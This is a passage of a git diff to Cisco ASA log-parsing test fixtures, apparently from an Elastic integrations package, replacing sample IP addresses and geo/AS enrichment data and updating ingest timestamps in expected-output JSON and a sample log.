201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", - "ip": "91.240.17.178" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4478,7 +4442,7 @@ "dev01" ], "ip": [ - "91.240.17.178" + "81.2.69.144" ] }, "host": { @@ -4486,8 +4450,8 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086613585Z", - "original": "Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", + "ingested": "2021-12-09T13:31:25.163218400Z", + "original": "Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.144, IP = 81.2.69.144, Security negotiation complete for LAN-to-LAN Group (81.2.69.144) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", "code": "713049", "kind": "event", "action": "firewall-rule", @@ -4509,29 +4473,29 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "bytes": 1216163, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "source": { "user": { - "name": "91.240.17.178" + "name": "81.2.69.144" }, "bytes": 297103 }, @@ -4550,13 +4514,13 @@ }, "related": { "user": [ - "91.240.17.178" + "81.2.69.144" ], "hosts": [ "dev01" ], "ip": [ - "91.240.17.178" + "81.2.69.144" ] }, "host": { @@ -4565,8 +4529,8 @@ "event": { "severity": 4, "duration": 0, - "ingested": "2021-07-19T09:05:57.086615270Z", - "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", + "ingested": "2021-12-09T13:31:25.163225Z", + "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", "code": "113019", "kind": "event", "start": "2021-04-27T02:03:03.000Z", @@ -4623,7 +4587,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086616962Z", + "ingested": "2021-12-09T13:31:25.163231500Z", "original": "Apr 27 02:03:03 dev01: %ASA-4-722051: Group \u003cVPN5Policy\u003e User \u003cjohn\u003e IP \u003c192.168.50.3\u003e IPv4 Address \u003c192.168.50.5\u003e IPv6 address \u003c::\u003e assigned to session", "code": "722051", "kind": "event", @@ -4650,25 +4614,28 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "user": { "name": "testuser" }, - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4691,7 +4658,7 @@ "dev01" ], "ip": [ - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -4700,8 +4667,8 @@ "event": { "severity": 6, "reason": "User Requested", - "ingested": "2021-07-19T09:05:57.086618639Z", - "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested.", + "ingested": "2021-12-09T13:31:25.163236500Z", + "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 81.2.69.144 WebVPN session terminated: User Requested.", "code": "716002", "kind": "event", "action": "firewall-rule", @@ -4761,7 +4728,7 @@ "event": { "severity": 6, "reason": "Idle timeout", - "ingested": "2021-07-19T09:05:57.086620348Z", + "ingested": "2021-12-09T13:31:25.163241700Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.", "code": "716002", "kind": "event", @@ -4786,50 +4753,32 @@ "level": "error" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-HCK", - "city_name": "Stoke Newington", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Hackney", - "location": { - "lon": -0.0765, - "lat": 51.5638 - } - }, - "as": { - "number": 8468, - "organization": { - "name": "Entanet" - } - }, - "address": "195.74.114.34", "port": 23, - "ip": "195.74.114.34" + "address": "192.168.157.61", + "ip": "192.168.157.61" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "IE-L", - "city_name": "Dublin", - "country_iso_code": "IE", - "country_name": "Ireland", - "region_name": "Leinster", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -6.2488, - "lat": 53.3338 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 8075, + "number": 20712, "organization": { - "name": "Microsoft Corporation" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "104.46.88.19", + "address": "81.2.69.144", "port": 6370, - "ip": "104.46.88.19" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4858,8 +4807,8 @@ "dev01" ], "ip": [ - "104.46.88.19", - "195.74.114.34" + "81.2.69.144", + "192.168.157.61" ] }, "host": { @@ -4867,8 +4816,8 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:05:57.086622029Z", - "original": "Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to outside:195.74.114.34/23", + "ingested": "2021-12-09T13:31:25.163248200Z", + "original": "Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 81.2.69.144/6370 to outside:192.168.157.61/23", "code": "710003", "kind": "event", "action": "firewall-rule", @@ -4899,25 +4848,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 8888, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4950,7 +4899,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -4959,8 +4908,8 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086623748Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:91.240.17.178/8888 to destinationInterfaceName:192.168.2.2/123123 locally", + "ingested": "2021-12-09T13:31:25.163253900Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/123123 locally", "code": "434004", "kind": "event", "action": "bypass", @@ -4992,25 +4941,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.138", + "address": "81.2.69.144", "port": 8888, - "ip": "91.240.17.138" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5043,7 +4992,7 @@ "dev01" ], "ip": [ - "91.240.17.138", + "81.2.69.144", "192.168.2.2" ] }, @@ -5053,8 +5002,8 @@ "event": { "severity": 4, "action": "drop", - "ingested": "2021-07-19T09:05:57.086625415Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:91.240.17.138/8888 to destinationInterfaceName:192.168.2.2/514514", + "ingested": "2021-12-09T13:31:25.163259500Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514", "code": "434002", "outcome": "unknown" }, @@ -5077,25 +5026,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5123,7 +5072,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5133,8 +5082,8 @@ "event": { "severity": 6, "reason": "Failed to locate egress interface", - "ingested": "2021-07-19T09:05:57.086627143Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:91.240.17.178/7777 to 192.168.2.2/123412", + "ingested": "2021-12-09T13:31:25.163263900Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.144/7777 to 192.168.2.2/123412", "code": "110002", "kind": "event", "action": "firewall-rule", @@ -5165,25 +5114,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5216,7 +5165,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5226,8 +5175,8 @@ "event": { "severity": 4, "reason": "Duplicate TCP SYN with different initial sequence number", - "ingested": "2021-07-19T09:05:57.086628859Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:91.240.17.178/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", + "ingested": "2021-12-09T13:31:25.163269600Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.144/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", "code": "419002", "kind": "event", "action": "firewall-rule", @@ -5256,24 +5205,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", - "ip": "91.240.17.178" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5301,7 +5250,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5311,8 +5260,8 @@ "event": { "severity": 6, "action": "created", - "ingested": "2021-07-19T09:05:57.086630778Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been created.", + "ingested": "2021-12-09T13:31:25.163275700Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created.", "code": "602303", "outcome": "success" }, @@ -5334,24 +5283,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", - "ip": "91.240.17.178" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5379,7 +5328,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5388,8 +5337,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086632521Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been deleted.", + "ingested": "2021-12-09T13:31:25.163281300Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been deleted.", "code": "602304", "kind": "event", "action": "deleted", @@ -5423,25 +5372,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5464,7 +5413,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5474,8 +5423,8 @@ "event": { "severity": 5, "reason": "Received a IKE_INIT_SA request", - "ingested": "2021-07-19T09:05:57.086634297Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", + "ingested": "2021-12-09T13:31:25.163287900Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", "code": "750002", "kind": "event", "action": "connection-started", @@ -5506,25 +5455,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5547,7 +5496,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5557,8 +5506,8 @@ "event": { "severity": 4, "reason": "Negotiation aborted due to Failed to locate an item in the database", - "ingested": "2021-07-19T09:05:57.086635947Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", + "ingested": "2021-12-09T13:31:25.163292700Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", "code": "750003", "kind": "event", "action": "error", @@ -5581,17 +5530,8 @@ "level": "notification" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.128.1.1", - "ip": "192.128.1.1" + "address": "192.168.1.1", + "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" @@ -5611,7 +5551,7 @@ "dev01" ], "ip": [ - "192.128.1.1" + "192.168.1.1" ] }, "host": { @@ -5620,8 +5560,8 @@ "event": { "severity": 5, "reason": "PHASE 2 COMPLETED", - "ingested": "2021-07-19T09:05:57.086637615Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.128.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)", + "ingested": "2021-12-09T13:31:25.163296900Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.168.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)", "code": "713120", "kind": "event", "action": "firewall-rule", @@ -5644,17 +5584,8 @@ "level": "notification" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.64.157.61", - "ip": "192.64.157.61" + "address": "192.168.157.61", + "ip": "192.168.157.61" }, "tags": [ "preserve_original_event" @@ -5674,7 +5605,7 @@ "dev01" ], "ip": [ - "192.64.157.61" + "192.168.157.61" ] }, "host": { @@ -5683,8 +5614,8 @@ "event": { "severity": 5, "reason": "Duplicate first packet detected", - "ingested": "2021-07-19T09:05:57.086639319Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.64.157.61, Duplicate first packet detected. Ignoring packet.", + "ingested": "2021-12-09T13:31:25.163341Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.168.157.61, Duplicate first packet detected. Ignoring packet.", "code": "713202", "kind": "event", "action": "firewall-rule", @@ -5704,17 +5635,8 @@ "level": "informational" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.128.1.1", - "ip": "192.128.1.1" + "address": "192.168.1.1", + "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" @@ -5734,7 +5656,7 @@ "dev01" ], "ip": [ - "192.128.1.1" + "192.168.1.1" ] }, "host": { @@ -5743,8 +5665,8 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-07-19T09:05:57.086641034Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!", + "ingested": "2021-12-09T13:31:25.163350100Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713905", "kind": "event", "action": "error", @@ -5786,7 +5708,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-07-19T09:05:57.086642711Z", + "ingested": "2021-12-09T13:31:25.163355500Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable!", "code": "713904", "kind": "event", @@ -5831,8 +5753,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086644442Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.128.1.1, All IPSec SA proposals found unacceptable!", + "ingested": "2021-12-09T13:31:25.163360800Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713903", "kind": "event", "action": "firewall-rule", @@ -5875,7 +5797,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-07-19T09:05:57.086646109Z", + "ingested": "2021-12-09T13:31:25.163365600Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable!", "code": "713902", "kind": "event", @@ -5901,17 +5823,8 @@ "level": "informational" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.128.1.1", - "ip": "192.128.1.1" + "address": "192.168.1.1", + "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" @@ -5931,7 +5844,7 @@ "dev01" ], "ip": [ - "192.128.1.1" + "192.168.1.1" ] }, "host": { @@ -5940,8 +5853,8 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-07-19T09:05:57.086647796Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!", + "ingested": "2021-12-09T13:31:25.163370900Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713901", "kind": "event", "action": "error", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log index 80efe8a5553..a3745b40968 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log @@ -8,4 +8,4 @@ Jun 08 2020 12:59:57: %ASA-4-313009: Denied invalid ICMP code 9, for Inside:10.2 Oct 20 2019 15:42:53: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575) -> inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f] Oct 20 2019 15:42:54: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575)(LOCAL\\username) -> inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f] Aug 6 2020 11:01:37: %ASA-session-3-106102: access-list dev_inward_client permitted udp for user redacted outside/10.123.123.20(49721) -> inside/10.223.223.40(53) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3] -Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -> outside/1.2.33.40(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3] +Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -> outside/81.2.69.144(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3] diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json index 66e6263b514..48c6d1a9356 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -57,7 +57,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:01.498773141Z", + "ingested": "2021-12-09T13:31:35.036770200Z", "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)", "code": "302016", "kind": "event", @@ -134,7 +134,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:01.498779612Z", + "ingested": "2021-12-09T13:31:35.036793100Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -203,7 +203,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:01.498781958Z", + "ingested": "2021-12-09T13:31:35.036798400Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]", "code": "106023", "kind": "event", @@ -279,7 +279,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:01.498783785Z", + "ingested": "2021-12-09T13:31:35.036803900Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:01.498789415Z", + "ingested": "2021-12-09T13:31:35.036832700Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", @@ -401,7 +401,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:06:01.498792593Z", + "ingested": "2021-12-09T13:31:35.036838Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-3-313008: Denied IPv6-ICMP type=134, code=0 from fe80::1ff:fe23:4567:890a on interface ISP1", "code": "313008", "kind": "event", @@ -471,7 +471,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:01.498794471Z", + "ingested": "2021-12-09T13:31:35.036843Z", "original": "Jun 08 2020 12:59:57: %ASA-4-313009: Denied invalid ICMP code 9, for Inside:10.255.0.206/8795 (10.255.0.206/8795) to identity:10.12.31.51/0 (10.12.31.51/0), ICMP id 295, ICMP type 8", "code": "313009", "kind": "event", @@ -545,7 +545,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:01.498796270Z", + "ingested": "2021-12-09T13:31:35.036865900Z", "original": "Oct 20 2019 15:42:53: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", @@ -615,7 +615,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:01.498798076Z", + "ingested": "2021-12-09T13:31:35.036871100Z", "original": "Oct 20 2019 15:42:54: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575)(LOCAL\\\\username) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", @@ -688,7 +688,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:06:01.498799824Z", + "ingested": "2021-12-09T13:31:35.036875Z", "original": "Aug 6 2020 11:01:37: %ASA-session-3-106102: access-list dev_inward_client permitted udp for user redacted outside/10.123.123.20(49721) -\u003e inside/10.223.223.40(53) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", "code": "106102", "kind": "event", @@ -720,19 +720,26 @@ }, "destination": { "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-GD", - "country_name": "China", - "region_name": "Guangdong", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 113.25, - "lat": 23.1167 - }, - "country_iso_code": "CN" + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } }, - "address": "1.2.33.40", + "address": "81.2.69.144", "port": 8080, - "ip": "1.2.33.40" + "ip": "81.2.69.144" }, "source": { "port": 64321, @@ -771,13 +778,13 @@ ], "ip": [ "10.1.2.3", - "1.2.33.40" + "81.2.69.144" ] }, 